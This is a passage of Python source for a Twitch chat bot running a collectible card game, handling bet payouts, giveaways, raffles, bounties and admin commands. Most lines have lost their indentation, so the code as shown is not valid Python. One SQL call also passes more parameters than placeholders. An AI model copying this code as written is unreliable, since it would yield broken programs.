msg = "You won %d pudding from the bet in %s's channel. Check and spend it with !pudding" % (pudding, channel[1:])
prizeStrings.append("%s - %d pudding" % (winner["name"], pudding))
cur.execute("UPDATE placed_bets SET prizePudding = %s WHERE betid = %s AND userid = %s",
[pudding, betRow[0], winner["id"]])
whispers.append(('#' + winner["name"], msg))
# broadcaster prize
                # broadcaster reward: run length in hours (minimum 1) * baseBroadcasterReward pudding, rounded and capped at maxBroadcasterReward
runHours = resultData["result"] / 3600000.0
bcPrize = round(min(max(runHours, 1) * bbReward, int(config["maxBroadcasterReward"])))
capped = False
if not isMarathonChannel:
cur.execute("SELECT COALESCE(SUM(paidBroadcaster), 0) FROM bets WHERE status='paid' AND SUBSTRING(FROM_UNIXTIME(startTime/1000),1,7)=SUBSTRING(NOW(),1,7) AND channel = %s", [channel])
puddingMonth = cur.fetchone()[0] or 0
if puddingMonth + bcPrize > int(config["maxMonthlyBCReward"]):
bcPrize = int(config["maxMonthlyBCReward"]) - puddingMonth
capped = True
prizeStrings.append("%s (broadcaster) - %d pudding%s" % (channel[1:], bcPrize, " (monthly cap reached)" if capped else ""))
whispers.append((channel, "You were rewarded %d pudding%s for running your recent bet. Check and spend it with !pudding" % (bcPrize, " (monthly cap reached)" if capped else "")))
# skip using addPudding to save a database lookup
cur.execute("UPDATE users SET puddingCurrent = puddingCurrent + %s WHERE name = %s", [bcPrize, channel[1:]])
                # start cooldown for next bet payout at max(endTime, lastPayout + 22h), capped at the current time
payoutTime = min(max(betRow[2], lastPayout + 79200000), current_milli_time())
cur.execute(
"UPDATE bets SET status = 'paid', paidBroadcaster = %s, paidAt = %s WHERE id = %s",
[bcPrize, payoutTime, betRow[0]])
messages = ["Paid out the following prizes: "]
first = True
for prize in prizeStrings:
msg = prize if first else "; " + prize
if len(messages[-1] + msg) > 400:
messages.append(prize)
else:
messages[-1] += msg
first = False
for message in messages:
self.message(channel, message, isWhisper)
# alert each person individually as well
# sent after the messages to the channel itself deliberately
for whisper in whispers:
self.message(whisper[0], whisper[1], True)
cur.close()
return
else:
self.message(channel,
"Usage: !bet <time> OR !bet status OR (as channel owner) !bet open OR !bet start OR !bet end OR !bet cancel OR !bet results",
isWhisper)
return
if command == "import" and sender in superadmins:
if len(args) != 1:
self.message(channel, "Usage: !import url", isWhisper)
return
url = args[0]
if "pastebin.com" in url and "/raw/" not in url:
url = url.replace("pastebin.com/", "pastebin.com/raw/")
try:
r = requests.get(url)
data = r.text.splitlines()
lineno = 0
errorlines = []
addwaifus = []
for line in data:
lineno += 1
if not line.strip():
continue
match = waifu_regex.fullmatch(line.strip())
if match:
addwaifus.append(match.groupdict())
else:
errorlines.append(lineno)
if len(errorlines) > 0:
self.message(channel,
"Error processing waifu data from lines: %s. Please fix formatting and try again." % ", ".join(
str(lineno) for lineno in errorlines), isWhisper)
return
else:
cur = db.cursor()
cur.executemany("INSERT INTO waifus (Name, image, base_rarity, series) VALUES(%s, %s, %s, %s)",
[(waifu["name"], waifu["link"], int(waifu["rarity"]), waifu["series"].strip())
for waifu in addwaifus])
cur.close()
self.message(channel, "Successfully added %d waifus to the database." % len(addwaifus),
isWhisper)
return
except Exception:
self.message(channel, "Error loading waifu data.", isWhisper)
logger.error("Error importing waifus: %s", str(sys.exc_info()))
return
if command == "sets" or command == "set":
if len(args) == 0:
self.message(channel,
"Available sets: %s/sets?user=%s . !sets claim to claim all sets you are eligible for." % (
config["siteHost"], sender.lower()), isWhisper=isWhisper)
return
subcmd = args[0].lower()
if subcmd == "rarity":
self.message(channel,
"Rarity sets have been suspended for the time being. They may return in some form at some point.",
isWhisper)
return
elif subcmd == "claim":
cur = db.cursor()
claimed = 0
# normal sets
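                # Find every unclaimed set for which this user already owns all of the set's cards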
cur.execute(
"SELECT DISTINCT sets.id, sets.name, sets.rewardPudding FROM sets WHERE sets.claimed_by IS NULL AND sets.id NOT IN (SELECT DISTINCT setID FROM set_cards LEFT OUTER JOIN (SELECT * FROM has_waifu JOIN users ON has_waifu.userid = users.id WHERE users.id = %s) AS a ON waifuid = cardID JOIN sets ON set_cards.setID = sets.id JOIN waifus ON cardID = waifus.id WHERE a.name IS NULL)",
[tags["user-id"]])
rows = cur.fetchall()
for row in rows:
claimed += 1
cur.execute("UPDATE sets SET claimed_by = %s, claimed_at = %s WHERE sets.id = %s",
[tags["user-id"], current_milli_time(), row[0]])
addPudding(tags["user-id"], int(row[2]))
badgeid = addBadge(row[1], config["setBadgeDescription"], config["setBadgeDefaultImage"])
giveBadge(tags['user-id'], badgeid)
self.message(channel,
"Successfully claimed the Set {set} and rewarded {user} with {reward} pudding!".format(
set=row[1], user=tags["display-name"], reward=row[2]), isWhisper)
cur.execute(
"SELECT waifus.name FROM set_cards INNER JOIN waifus ON set_cards.cardID = waifus.id WHERE setID = %s",
[row[0]])
cards = [sc[0] for sc in cur.fetchall()]
threading.Thread(target=sendSetAlert,
args=(channel, tags["display-name"], row[1], cards, row[2])).start()
if claimed == 0:
self.message(channel,
"You do not have any completed sets that are available to be claimed. !sets to check progress.",
isWhisper=isWhisper)
return
cur.close()
return
else:
self.message(channel, "Usage: !sets OR !sets claim", isWhisper=isWhisper)
return
if command == "debug" and sender in superadmins:
if debugMode:
updateBoth("Hyperdimension Neptunia", "Testing title updates.")
self.message(channel, "Title and game updated for testing purposes")
else:
self.message(channel, "Debug mode is off. Debug command disabled.")
return
if command == "givefreepack" and sender in superadmins:
if len(args) < 2:
self.message(channel, "Usage: !givefreepack <username> <booster name> [<amount> (default 1)]", isWhisper)
return
if len(args) >= 3:
try:
amount = int(args[2])
except ValueError:
self.message(channel, "Invalid amount specified.", isWhisper)
return
else:
amount = 1
with db.cursor() as cur:
cur.execute("SELECT id, name FROM users WHERE name = %s", [args[0]])
userData = cur.fetchone()
if userData is None:
self.message(channel, "Invalid username specified.", isWhisper)
return
cur.execute("SELECT COUNT(*) FROM boosters WHERE name = %s", [args[1]])
if cur.fetchone()[0] == 0:
self.message(channel, "Invalid booster name specified.", isWhisper)
return
giveFreeBooster(userData[0], args[1], amount)
if amount > 1:
self.message('#%s' % userData[1], "You were given %d free %s packs by an admin. Check them using !freepacks" % (amount, args[1]), True)
else:
self.message('#%s' % userData[1], "You were given a free %s pack by an admin. Open it using !freepacks open %s" % (args[1], args[1]), True)
self.message(channel, "Successfully gave %d %s packs to %s." % (amount, args[1], userData[1]), isWhisper)
return
if command == "nepcord":
self.message(channel,
"To join the discussion in the official Waifu TCG Discord Channel, go to %s/discord" %
config["siteHost"], isWhisper=isWhisper)
return
if command == "giveaway":
if booleanConfig("marathonOnlyGiveaway") and not isMarathonChannel:
return
cur = db.cursor()
if len(args) == 0 or args[0].lower() == 'enter':
# check for a giveaway to enter
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is None or giveaway_info[1] == 'closed':
self.message(channel, "There is not an open giveaway right now.", isWhisper)
cur.close()
return
# look for our own entry already existing
cur.execute("SELECT COUNT(*) FROM giveaway_entries WHERE giveawayid = %s AND userid = %s",
[giveaway_info[0], tags['user-id']])
entry_count = cur.fetchone()[0] or 0
if entry_count != 0:
self.message(channel,
"%s -> You have already entered the current giveaway." % tags["display-name"],
isWhisper)
cur.close()
return
# add an entry
cur.execute("INSERT INTO giveaway_entries (giveawayid, userid, timestamp) VALUES(%s, %s, %s)",
[giveaway_info[0], tags['user-id'], current_milli_time()])
self.message(channel,
"%s -> You have been entered into the current giveaway." % tags["display-name"],
isWhisper)
cur.close()
return
if sender not in superadmins:
return
subcmd = args[0].lower()
if subcmd == 'open':
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is not None and giveaway_info[1] != 'closed':
self.message(channel, "There is already an open giveaway right now.", isWhisper)
cur.close()
return
# create a new giveaway
cur.execute("INSERT INTO giveaways (opened, creator, status) VALUES(%s, %s, 'open')",
[current_milli_time(), tags['user-id']])
self.message(channel, "Started a new giveaway!", isWhisper)
cur.close()
return
if subcmd == 'close':
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is None or giveaway_info[1] == 'closed':
self.message(channel, "There is not an open giveaway right now.", isWhisper)
cur.close()
return
cur.execute("UPDATE giveaways SET closed = %s, status = 'closed' WHERE id = %s",
[current_milli_time(), giveaway_info[0]])
self.message(channel, "Closed entries for the current giveaway!", isWhisper)
cur.close()
return
if subcmd == 'pick':
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is None:
self.message(channel, "There hasn't been a giveaway yet.", isWhisper)
cur.close()
return
if len(args) < 2:
self.message(channel, "Usage: !giveaway pick <amount of winners>", isWhisper)
cur.close()
return
try:
num_winners = int(args[1])
except Exception:
self.message(channel, "Usage: !giveaway pick <amount of winners>", isWhisper)
cur.close()
return
cur.execute(
"SELECT giveaway_entries.userid, users.name FROM giveaway_entries INNER JOIN users ON giveaway_entries.userid = users.id WHERE giveaway_entries.giveawayid = %s AND giveaway_entries.winner = 0 ORDER BY RAND() LIMIT " + str(
num_winners), [giveaway_info[0]])
winners = cur.fetchall()
if len(winners) != num_winners:
self.message(channel,
"There aren't enough entrants left to pick %d more winners! Try %d or fewer." % (
num_winners, len(winners)), isWhisper)
cur.close()
return
winner_ids = [row[0] for row in winners]
inTemplate = ",".join(["%s"] * len(winner_ids))
winner_names = ", ".join(row[1] for row in winners)
cur.execute(
"UPDATE giveaway_entries SET winner = 1, when_won = %s WHERE giveawayid = %s AND userid IN (" + inTemplate + ")",
[current_milli_time(), giveaway_info[0]] + winner_ids)
self.message(channel, "Picked %d winners for the giveaway: %s!" % (num_winners, winner_names),
isWhisper)
cur.close()
return
if command == "raffle":
with db.cursor() as cur:
cur.execute("SELECT id, status, ticket_price, max_tickets FROM raffles ORDER BY id DESC LIMIT 1")
raffle_info = cur.fetchone()
if len(args) == 0:
# check for info
if raffle_info is None or raffle_info[1] == 'done':
self.message(channel, "No raffle is open at this time.", isWhisper)
return
else:
cur.execute(
"SELECT num_tickets, num_winners, won_grand FROM raffle_tickets WHERE raffleid = %s AND userid = %s",
[raffle_info[0], tags['user-id']])
my_tickets = cur.fetchone()
if raffle_info[1] == 'open':
if my_tickets is None:
self.message(channel,
"There is a raffle currently open. You can buy up to %d tickets for %d points each using !raffle buy <amount>. You don't have any tickets right now." % (
raffle_info[3], raffle_info[2]), isWhisper)
elif my_tickets[0] < raffle_info[3]:
self.message(channel,
"There is a raffle currently open. You have bought %d tickets so far. You can buy up to %d more for %d points each using !raffle buy <amount>." % (
my_tickets[0], raffle_info[3] - my_tickets[0], raffle_info[2]),
isWhisper)
else:
self.message(channel,
"There is a raffle currently open. You are already at the limit of %d tickets." % (
raffle_info[3]), isWhisper)
else:
# raffle in process of drawing
if my_tickets is None:
self.message(channel,
"The current raffle is in the process of being drawn. Unfortunately, you didn't buy any tickets! Try again next raffle.")
else:
if my_tickets[2] != 0:
self.message(channel,
"The current raffle is in the process of being drawn. So far you have won %d minor prizes and a grand prize from your %d tickets!" % (
my_tickets[1] - 1, my_tickets[0]))
else:
self.message(channel,
"The current raffle is in the process of being drawn. So far, you have won %d minor prizes and no grand prize from your %d tickets." % (
my_tickets[1], my_tickets[0]))
return
subcmd = args[0].lower()
if subcmd == 'buy':
                    if raffle_info is None or raffle_info[1] != 'open':
self.message(channel,
"Raffle ticket purchases aren't open right now. Use !raffle to check the overall status.")
return
if len(args) < 2:
self.message(channel, "Usage: !raffle buy <amount>", isWhisper)
return
try:
tickets = int(args[1])
assert tickets >= 0
except Exception:
self.message(channel, "Invalid amount of tickets specified.", isWhisper)
return
cur.execute(
"SELECT num_tickets, num_winners, won_grand FROM raffle_tickets WHERE raffleid = %s AND userid = %s",
[raffle_info[0], tags['user-id']])
my_tickets = cur.fetchone()
can_buy = raffle_info[3] if my_tickets is None else raffle_info[3] - my_tickets[0]
cost = tickets * raffle_info[2]
if tickets > can_buy:
if can_buy == 0:
self.message(channel,
"%s, you're already at the maximum of %d tickets for this raffle. Please wait for the drawing." % (
tags['display-name'], raffle_info[3]), isWhisper)
else:
self.message(channel,
"%s, you can only buy %d more tickets for this raffle. Please adjust your purchase." % (
tags['display-name'], can_buy), isWhisper)
return
if not hasPoints(tags['user-id'], cost):
self.message(channel, "%s, you don't have the %d points required to buy %d tickets." % (
tags['display-name'], cost, tickets), isWhisper)
return
# okay, buy the tickets
addPoints(tags['user-id'], -cost)
if my_tickets is None:
cur.execute(
"INSERT INTO raffle_tickets (raffleid, userid, num_tickets, created) VALUES(%s, %s, %s, %s)",
[raffle_info[0], tags['user-id'], tickets, current_milli_time()])
else:
cur.execute(
"UPDATE raffle_tickets SET num_tickets = num_tickets + %s, updated = %s WHERE raffleid = %s AND userid = %s",
[tickets, current_milli_time(), raffle_info[0], tags['user-id']])
self.message(channel, "%s, you successfully bought %d raffle tickets for %d points." % (
tags['display-name'], tickets, cost), isWhisper)
return
if sender not in superadmins:
self.message(channel, "Usage: !raffle / !raffle buy <amount>", isWhisper)
return
if subcmd == 'open':
if raffle_info is not None and raffle_info[1] != 'done':
self.message(channel, "There is already an incomplete raffle right now.", isWhisper)
return
if len(args) < 3:
self.message(channel, "Usage: !raffle open <points per ticket> <max tickets>", isWhisper)
return
try:
points_per_ticket = int(args[1])
max_tickets = int(args[2])
assert max_tickets > 0 and max_tickets < 100
assert points_per_ticket >= 100
except Exception:
self.message(channel,
"Invalid arguments. Usage: !raffle open <points per ticket> <max tickets>",
isWhisper)
return
# create a new raffle
cur.execute(
"INSERT INTO raffles (opened, creator, status, ticket_price, max_tickets) VALUES(%s, %s, 'open', %s, %s)",
[current_milli_time(), tags['user-id'], points_per_ticket, max_tickets])
self.message(channel, "Started a new raffle!", isWhisper)
cur.close()
return
if subcmd == 'close':
if raffle_info is None or raffle_info[1] != 'open':
self.message(channel, "There is not an open raffle right now.", isWhisper)
return
cur.execute("UPDATE raffles SET closed = %s, status = 'drawing' WHERE id = %s",
[current_milli_time(), raffle_info[0]])
self.message(channel, "Closed ticket purchases for the current raffle!", isWhisper)
return
if subcmd == 'complete':
if raffle_info is None or raffle_info[1] != 'drawing':
self.message(channel, "There is not a raffle in the process of drawing right now.",
isWhisper)
return
cur.execute("UPDATE raffles SET status = 'done' WHERE id = %s",
[current_milli_time(), raffle_info[0]])
self.message(channel, "Closed drawing for the current raffle!", isWhisper)
return
if subcmd == 'pick' or subcmd == 'draw':
if raffle_info is None or raffle_info[1] != 'drawing':
self.message(channel, "There is not a raffle in the process of drawing right now.",
isWhisper)
return
if len(args) < 2:
self.message(channel, "Usage: !raffle pick <amount of winners>", isWhisper)
return
winners = []
try:
num_winners = int(args[1])
assert num_winners > 0
except Exception:
self.message(channel, "Usage: !raffle pick <amount of winners>", isWhisper)
return
for i in range(num_winners):
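                        # Weighted draw: ordering by -LOG(1-RAND())/weight picks a holder with probability proportional to their remaining non-winning tickets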
cur.execute(
"SELECT raffle_tickets.userid, users.name FROM raffle_tickets INNER JOIN users ON raffle_tickets.userid = users.id WHERE raffle_tickets.raffleid = %s AND raffle_tickets.num_winners < raffle_tickets.num_tickets ORDER BY -LOG(1-RAND())/(num_tickets - num_winners) LIMIT 1",
[raffle_info[0]])
winner = cur.fetchone()
if winner is None:
# completely out of non-winning tickets
break
# add their name to the winner list
winners.append(winner[1])
# update their ticket entry
cur.execute(
"UPDATE raffle_tickets SET num_winners = num_winners + 1, updated = %s WHERE raffleid = %s AND userid = %s",
[current_milli_time(), raffle_info[0], winner[0]])
if len(winners) == 0:
self.message(channel,
"Drew no new minor prize winners - the system is out of non-winning tickets!",
isWhisper)
elif len(winners) < num_winners:
self.message(channel, "Drew %d minor prize winners (truncated) - %s !" % (
len(winners), ", ".join(winners)), isWhisper)
else:
self.message(channel,
"Drew %d minor prize winners - %s !" % (len(winners), ", ".join(winners)),
isWhisper)
return
if subcmd == 'pickgrand' or subcmd == 'drawgrand':
if raffle_info is None or raffle_info[1] != 'drawing':
self.message(channel, "There is not a raffle in the process of drawing right now.",
isWhisper)
return
if len(args) >= 2:
self.message(channel, "!raffle drawgrand only draws one winner at once.", isWhisper)
return
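                    # Same weighted draw as the minor prizes, restricted to holders with a non-winning ticket who have not yet won a grand prize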
cur.execute(
"SELECT raffle_tickets.userid, users.name FROM raffle_tickets INNER JOIN users ON raffle_tickets.userid = users.id WHERE raffle_tickets.raffleid = %s AND raffle_tickets.num_winners < raffle_tickets.num_tickets AND raffle_tickets.won_grand = 0 ORDER BY -LOG(1-RAND())/(num_tickets - num_winners) LIMIT 1",
[raffle_info[0]])
winner = cur.fetchone()
if winner is None:
# completely out of non-winning tickets
self.message(channel,
"Could not draw a new grand prize winner as there are no applicable users left!",
isWhisper)
return
# update their ticket entry
cur.execute(
"UPDATE raffle_tickets SET num_winners = num_winners + 1, won_grand = 1, updated = %s WHERE raffleid = %s AND userid = %s",
[current_milli_time(), raffle_info[0], winner[0]])
self.message(channel, "Drew a new grand prize winner: %s!" % winner[1])
return
if command == "bounty":
if len(args) == 0:
self.message(channel,
"Usage: !bounty <ID> <amount> / !bounty list / !bounty check <ID> / !bounty cancel <ID>",
isWhisper=isWhisper)
return
subcmd = args[0].lower()
# support !bounty ID amount to place an order
if subcmd not in ['check', 'place', 'add', 'list', 'cancel']:
args = ['place'] + args
subcmd = 'place'
if subcmd == "check":
if len(args) != 2:
self.message(channel, "Usage: !bounty check <ID>", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
waifu = getWaifuById(args[1])
assert waifu is not None
assert waifu['can_lookup'] == 1
if waifu['base_rarity'] >= int(config["numNormalRarities"]):
self.message(channel, "Bounties cannot be placed on special waifus.", isWhisper)
return
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
with db.cursor() as cur:
cur.execute(
"SELECT COUNT(*), COALESCE(MAX(amount), 0) FROM bounties WHERE waifuid = %s AND status='open'",
[waifu['id']])
allordersinfo = cur.fetchone()
if allordersinfo[0] == 0:
self.message(channel,
"[{id}] {name} has no bounties right now.".format(id=waifu['id'],
name=waifu['name']),
isWhisper)
return
cur.execute(
"SELECT amount FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
minfo = {"count": allordersinfo[0], "id": waifu['id'], "name": waifu['name'],
"highest": allordersinfo[1]}
if myorderinfo is not None:
minfo["mine"] = myorderinfo[0]
if myorderinfo[0] == allordersinfo[1]:
self.message(channel,
"There are currently {count} bounties for [{id}] {name}. You are the highest bidder at {highest} points.".format(
**minfo), isWhisper)
else:
self.message(channel,
"There are currently {count} bounties for [{id}] {name}. Your bid of {mine} points is lower than the highest bid of {highest} points.".format(
**minfo), isWhisper)
else:
self.message(channel,
"There are currently {count} bounties for [{id}] {name}. The highest bid is {highest} points. You don't have a bounty on this waifu right now.".format(
**minfo), isWhisper)
except Exception:
self.message(channel, "Invalid waifu ID.", isWhisper=isWhisper)
return
if subcmd == "list":
cur = db.cursor()
cur.execute(
"SELECT waifuid, amount, waifus.name FROM bounties JOIN waifus ON bounties.waifuid = waifus.id WHERE userid = %s AND status='open'",
[tags['user-id']])
buyorders = cur.fetchall()
cur.close()
if len(buyorders) == 0:
self.message(channel,
"%s, you don't have any bounties active right now!" % tags['display-name'],
isWhisper)
return
messages = ["%s, you have %d active bounties: " % (tags['display-name'], len(buyorders))]
for order in buyorders:
message = "[%d] %s for %d points; " % (order[0], order[2], order[1])
if len(message) + len(messages[-1]) > 400:
messages.append(message)
else:
messages[-1] += message
for message in messages:
self.message(channel, message, isWhisper)
return
if subcmd == "place" or subcmd == "add":
if len(args) < 3:
self.message(channel, "Usage: !bounty <ID> <amount>", isWhisper)
return
if not followsme(tags['user-id']):
self.message(channel,
"%s, you must follow the bot to use bounties so you can be sent a whisper if your order is filled." %
tags['display-name'], isWhisper)
return
try:
waifu = getWaifuById(args[1])
assert waifu is not None
assert waifu['can_lookup'] == 1
if waifu['base_rarity'] >= int(config["numNormalRarities"]):
self.message(channel, "Bounties cannot be placed on special waifus.", isWhisper)
return
amount = int(args[2])
# check for a current order
cur = db.cursor()
cur.execute(
"SELECT id, amount FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
if myorderinfo is not None and myorderinfo[1] == amount:
self.message(channel,
"%s, you already have a bounty in place for that waifu for that exact amount." %
tags['display-name'], isWhisper)
cur.close()
return
# check for affordability
old_bounty = 0 if myorderinfo is None else myorderinfo[1]
points_delta = amount if myorderinfo is None else amount - myorderinfo[1]
if points_delta > 0 and not hasPoints(tags['user-id'], points_delta):
if myorderinfo is None:
self.message(channel,
"%s, you don't have enough points to place a bounty with that amount." %
tags['display-name'], isWhisper)
else:
self.message(channel,
"%s, you don't have enough points to increase your bounty to that amount." %
tags['display-name'], isWhisper)
cur.close()
return
# check for hand space
if myorderinfo is None and currentCards(tags['user-id']) >= handLimit(tags['user-id']):
self.message(channel, "%s, you don't have a free hand space to make a new bounty!" % tags[
'display-name'], isWhisper)
cur.close()
return
# check the range
cur.execute(
"SELECT COALESCE(MAX(amount), 0) FROM bounties WHERE userid != %s AND waifuid = %s AND status = 'open'",
[tags['user-id'], waifu['id']])
highest_other_bid = cur.fetchone()[0]
de_value = int(config["rarity%dValue" % waifu['base_rarity']])
min_amount = int(config["rarity%dMinBounty" % waifu['base_rarity']])
rarity_cap = int(config["rarity%dMaxBounty" % waifu['base_rarity']])
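                    # Bids may go up to the rarity cap, or up to 20% above the highest competing bid if that is already higher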
max_amount = max(rarity_cap, highest_other_bid * 6 // 5)
if amount < min_amount or amount > max_amount:
self.message(channel,
"%s, your bounty for this waifu must fall between %d and %d points." % (
tags['display-name'], min_amount, max_amount), isWhisper)
cur.close()
return
# outbidding?
outbidding = highest_other_bid != 0 and amount > highest_other_bid and old_bounty < highest_other_bid
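                    # An outbid must beat the current high bid by at least 5%, and never by less than 5 points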
minimum_outbid = max(highest_other_bid // 20, 5)
if outbidding:
if amount < highest_other_bid + minimum_outbid:
self.message(channel,
"%s, you must place a bounty of at least %d points to outbid the current highest bid of %d points." % (
tags['display-name'], highest_other_bid + minimum_outbid,
highest_other_bid), isWhisper)
cur.close()
return
elif amount < old_bounty and highest_other_bid + minimum_outbid > amount and amount > highest_other_bid:
self.message(channel,
"%s, the lowest you can reduce your bounty to is %d points due to the bid of %d points below it." % (
tags['display-name'], highest_other_bid + minimum_outbid,
highest_other_bid))
cur.close()
return
# check for duplicate amount
cur.execute(
"SELECT COUNT(*) FROM bounties WHERE waifuid = %s AND status = 'open' AND amount = %s",
[waifu['id'], amount])
dupe_amt = cur.fetchone()[0]
if dupe_amt > 0:
self.message(channel,
"%s, someone else has already placed a bounty on that waifu for %d points. Choose another amount." % (
tags['display-name'], amount), isWhisper)
cur.close()
return
# actions that require confirmation first
if len(args) < 4 or args[3].lower() != 'yes':
# check for placing a bounty that has already been outbid
if highest_other_bid > amount:
msgargs = (tags['display-name'], highest_other_bid, waifu['id'], amount)
if myorderinfo is None:
self.message(channel,
'%s, are you sure you want to place a bounty for lower than the current highest bid (%d points)? Enter "!bounty %d %d yes" if you are sure.' % msgargs,
isWhisper)
else:
self.message(channel,
'%s, are you sure you want to change your bounty to a lower amount than the current other highest bid (%d points)? Enter "!bounty %d %d yes" if you are sure.' % msgargs,
isWhisper)
cur.close()
return
# check for placing a bounty above regular cap
if amount > rarity_cap:
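                            # Above the rarity cap only half of the excess is refundable on cancellation, so ask for confirmation first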
amount_refund = (amount - rarity_cap) // 2 + rarity_cap
msgargs = (tags['display-name'], amount_refund, waifu['id'], amount)
self.message(channel,
'%s, are you sure you want to place a bounty above the normal cap for that waifu\'s rarity? If you cancel it, you will only receive %d points back unless a higher bounty than yours is filled. Enter "!bounty %d %d yes" if you are sure.' % msgargs,
isWhisper)
cur.close()
return
# if it passed all of those checks it should be good to go.
# penalize them for reducing a bounty above regular cap?
if points_delta < 0 and old_bounty > rarity_cap:
change_above_cap = min(-points_delta, old_bounty - rarity_cap)
addPoints(tags['user-id'], change_above_cap // 2 + (-points_delta - change_above_cap))
else:
addPoints(tags['user-id'], -points_delta)
if myorderinfo is None:
cur.execute(
"INSERT INTO bounties (userid, waifuid, amount, status, created) VALUES(%s, %s, %s, 'open', %s)",
[tags['user-id'], waifu['id'], amount, current_milli_time()])
self.message(channel, "%s, you placed a new bounty on [%d] %s for %d points." % (
tags['display-name'], waifu['id'], waifu['name'], amount), isWhisper)
else:
cur.execute("UPDATE bounties SET amount = %s, updated = %s WHERE id = %s",
[amount, current_milli_time(), myorderinfo[0]])
self.message(channel, "%s, you updated your bounty on [%d] %s to %d points." % (
tags['display-name'], waifu['id'], waifu['name'], amount), isWhisper)
# outbid message?
if outbidding:
# attempt to whisper for outbid
cur.execute(
"SELECT users.name FROM bounties JOIN users ON bounties.userid=users.id WHERE bounties.waifuid = %s AND bounties.amount = %s AND bounties.status = 'open' LIMIT 1",
[waifu['id'], highest_other_bid])
other_bidder = cur.fetchone()
if other_bidder is not None:
self.message('#%s' % other_bidder[0],
"Your bounty on [%d] %s has been outbid. The new highest bounty is %d points." % (
waifu['id'], waifu['name'], amount), True)
cur.close()
return
except Exception as exc:
self.message(channel, "Usage: !bounty <ID> <amount>", isWhisper=isWhisper)
return
if subcmd == "cancel":
if len(args) != 2:
self.message(channel, "Usage: !bounty cancel <ID>", isWhisper=isWhisper)
return
try:
waifu = getWaifuById(args[1])
assert waifu is not None
assert waifu['can_lookup'] == 1
# check for a current order
cur = db.cursor()
cur.execute(
"SELECT id, amount, created, updated FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
                    if myorderinfo is not None:
                        bounty_time = myorderinfo[3] if myorderinfo[3] is not None else myorderinfo[2]
                        cur.execute("UPDATE bounties SET status = 'cancelled', updated = %s WHERE id = %s",
                                    [current_milli_time(), myorderinfo[0]])
# penalise them?
rarity_cap = int(config["rarity%dMaxBounty" % waifu['base_rarity']])
# free cancel after direct outbid was met?
cur.execute(
"SELECT COUNT(*) FROM bounties WHERE waifuid = %s AND status='filled' AND updated > %s",
[waifu['id'], bounty_time])
free_cancel = cur.fetchone()[0] > 0
if myorderinfo[1] > rarity_cap and not free_cancel:
refund = (myorderinfo[1] - rarity_cap) // 2 + rarity_cap
addPoints(tags['user-id'], refund)
self.message(channel,
"%s, you cancelled your bounty for [%d] %s and received only %d points back since it was above cap." % (
tags['display-name'], waifu['id'], waifu['name'], refund), isWhisper)
else:
addPoints(tags['user-id'], myorderinfo[1])
self.message(channel,
"%s, you cancelled your bounty for [%d] %s and received your %d points back." % (
tags['display-name'], waifu['id'], waifu['name'], myorderinfo[1]),
isWhisper)
else:
self.message(channel,
"%s, you don't have an active bounty for that waifu!" % tags['display-name'],
isWhisper)
cur.close()
return
except Exception:
self.message(channel, "Usage: !bounty cancel <ID>", isWhisper=isWhisper)
return
if command == "raritychange" and sender in superadmins:
hasConfirmed = False
if len(args) > 0 and args[-1].lower() == "yes":
hasConfirmed = True
args = args[:-1]
if len(args) < 2:
self.message(channel, "Usage: !raritychange <ID> <rarity>", isWhisper)
return
try:
waifu = getWaifuById(args[0])
assert waifu is not None
rarity = parseRarity(args[1])
except Exception:
self.message(channel, "Usage: !raritychange <ID> <rarity>", isWhisper)
return
if waifu['base_rarity'] == int(config['numNormalRarities']):
self.message(channel, "You shouldn't be changing a special waifu into another rarity.", isWhisper)
return
if rarity == waifu['base_rarity']:
self.message(channel, "[%d] %s is already %s base rarity!" % (
waifu['id'], waifu['name'], config['rarity%dName' % rarity]), isWhisper)
return
if not hasConfirmed and rarity > waifu['base_rarity'] and waifu['base_rarity'] < int(config["numNormalRarities"]) - 1:
# check for promoted copies existing
with db.cursor() as cur:
cur.execute("SELECT COUNT(*) FROM has_waifu WHERE waifuid = %s AND rarity BETWEEN %s AND %s", [waifu['id'], waifu['base_rarity'] + 1, int(config["numNormalRarities"]) - 1])
if cur.fetchone()[0] > 0:
self.message(channel, "WARNING: You are trying to increase the rarity of a card which people have already promoted. This may cause undesirable results. Append ' yes' to your command if you want to do this anyway.", isWhisper)
return
# limit check
oldRarityLimit = int(config['rarity%dMax' % waifu['base_rarity']])
newRarityLimit = int(config['rarity%dMax' % rarity])
if newRarityLimit != 0 and (oldRarityLimit == 0 or oldRarityLimit > newRarityLimit):
with db.cursor() as cur:
cur.execute(
"SELECT (SELECT COALESCE(SUM(amount), 0) FROM has_waifu WHERE waifuid = %s) + (SELECT COUNT(*) FROM boosters_cards JOIN boosters_opened ON boosters_cards.boosterid=boosters_opened.id WHERE boosters_cards.waifuid = %s AND boosters_opened.status = 'open')",
[waifu['id'], waifu['id']])
currentOwned = cur.fetchone()[0]
if currentOwned > newRarityLimit:
errorArgs = (
waifu['id'], waifu['name'], config['rarity%dName' % rarity], currentOwned, newRarityLimit)
self.message(channel,
"[%d] %s cannot be changed to %s base rarity. There are %d copies of her already owned while the limit at the new rarity would be %d." % errorArgs,
isWhisper)
return
# okay, do it
with db.cursor() as cur:
if rarity < int(config['numNormalRarities']):
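                    # Clamp the card's drop weighting into the range already used by cards of the new rarity while setting the new base rarity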
cur.execute("UPDATE waifus SET normal_weighting = LEAST(GREATEST(normal_weighting, (SELECT MIN(w1.normal_weighting) FROM (SELECT * FROM waifus) w1 WHERE w1.base_rarity = %s)), (SELECT MAX(w2.normal_weighting) FROM (SELECT * FROM waifus) w2 WHERE w2.base_rarity = %s)), base_rarity = %s WHERE id = %s", [rarity, rarity, rarity, waifu['id']])
else:
